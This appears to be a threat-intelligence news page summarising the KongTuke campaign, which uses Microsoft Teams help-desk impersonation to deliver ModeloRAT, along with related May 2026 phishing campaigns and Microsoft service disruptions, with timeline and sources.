KongTuke Microsoft Teams initial access campaign
Campaign
Summary
Hide ▲
Show ▼
The KongTuke campaign now uses Microsoft Teams social engineering to gain persistent access to corporate networks, shortening initial compromise to under five minutes and increasing downstream abuse risk. Operators pose as IT/help-desk staff and push victims to run a malicious PowerShell command that deploys ModeloRAT. The activity has run since at least April 2026 and has rotated through five Microsoft 365 tenants to evade blocking.
Related Happenings
Microsoft Teams on macOS repeated location-prompt service disruption
Service Disruption
First: 19.05.2026 19:10
Last: 19.05.2026 19:10
Sources 1
About this happening:
Microsoft confirmed a **Microsoft Teams on macOS** service disruption that causes **non-dismissible location prompts** for some users, interrupting normal app use for those who en...
Microsoft Teams on macOS repeated location-prompt service disruption
Service DisruptionAbout this happening: Microsoft confirmed a **Microsoft Teams on macOS** service disruption that causes **non-dismissible location prompts** for some users, interrupting normal app use for those who en...
Tycoon2FA device-code phishing campaign targeting Microsoft 365
Campaign
First: 17.05.2026 17:43
Last: 17.05.2026 17:43
Sources 1
About this happening:
The **Tycoon2FA** phishing operation added **device-code phishing** to hijack **Microsoft 365** accounts, expanding its ability to steal access tokens and reach email, calendar, a...
Tycoon2FA device-code phishing campaign targeting Microsoft 365
CampaignAbout this happening: The **Tycoon2FA** phishing operation added **device-code phishing** to hijack **Microsoft 365** accounts, expanding its ability to steal access tokens and reach email, calendar, a...
ModeloRAT malicious PowerShell and Dropbox delivery activity
Malware Activity
First: 14.05.2026 15:12
Last: 14.05.2026 15:12
Sources 1
How related:
The malware collects system and user information, captures screenshots, and can exfiltrate files from the host filesystem.
About this happening:
The **ModeloRAT** activity now uses a **malicious PowerShell command** and a **Dropbox ZIP payload** to gain persistent footholds, enabling **system reconnaissance**, **screenshot...
ModeloRAT malicious PowerShell and Dropbox delivery activity
Malware ActivityHow related: The malware collects system and user information, captures screenshots, and can exfiltrate files from the host filesystem.
About this happening: The **ModeloRAT** activity now uses a **malicious PowerShell command** and a **Dropbox ZIP payload** to gain persistent footholds, enabling **system reconnaissance**, **screenshot...
Microsoft Windows 365 Office installation disruption
Service Disruption
First: 13.05.2026 14:53
Last: 13.05.2026 14:53
Sources 1
About this happening:
The **Windows 365** service update has introduced a **configuration change** that is blocking **Office downloads and installs** for some customers, disrupting access on cloud PCs....
Microsoft Windows 365 Office installation disruption
Service DisruptionAbout this happening: The **Windows 365** service update has introduced a **configuration change** that is blocking **Office downloads and installs** for some customers, disrupting access on cloud PCs....
MuddyWater Microsoft Teams social-engineering campaign with Chaos ransomware decoy
Campaign
First: 06.05.2026 16:02
Last: 06.05.2026 16:02
Sources 1
About this happening:
The **MuddyWater** campaign used **Microsoft Teams** social engineering and a **Chaos ransomware** decoy to gain access, steal credentials, and establish persistence. The operatio...
MuddyWater Microsoft Teams social-engineering campaign with Chaos ransomware decoy
CampaignAbout this happening: The **MuddyWater** campaign used **Microsoft Teams** social engineering and a **Chaos ransomware** decoy to gain access, steal credentials, and establish persistence. The operatio...
Timeline
-
14.05.2026 15:12 2 articles · 13d ago
KongTuke uses Microsoft Teams to social-engineer employees
Initial DisclosureKongTuke uses Microsoft Teams social engineering against company employees, posing as IT and help-desk staff to persuade victims to run a malicious PowerShell command that downloads a Dropbox ZIP, loads a portable WinPython environment, and launches ModeloRAT. The campaign has been active since at least April 2026, has rotated through five Microsoft 365 tenants to evade blocking, and defenders can blunt the activity by restricting external Microsoft Teams federation with allowlists and hunting for indicators of compromise.
Show sources
- KongTuke hackers now use Microsoft Teams for corporate breaches — www.bleepingcomputer.com — 14.05.2026 15:12
- KongTuke hackers now use Microsoft Teams for corporate breaches — www.bleepingcomputer.com — 14.05.2026 15:12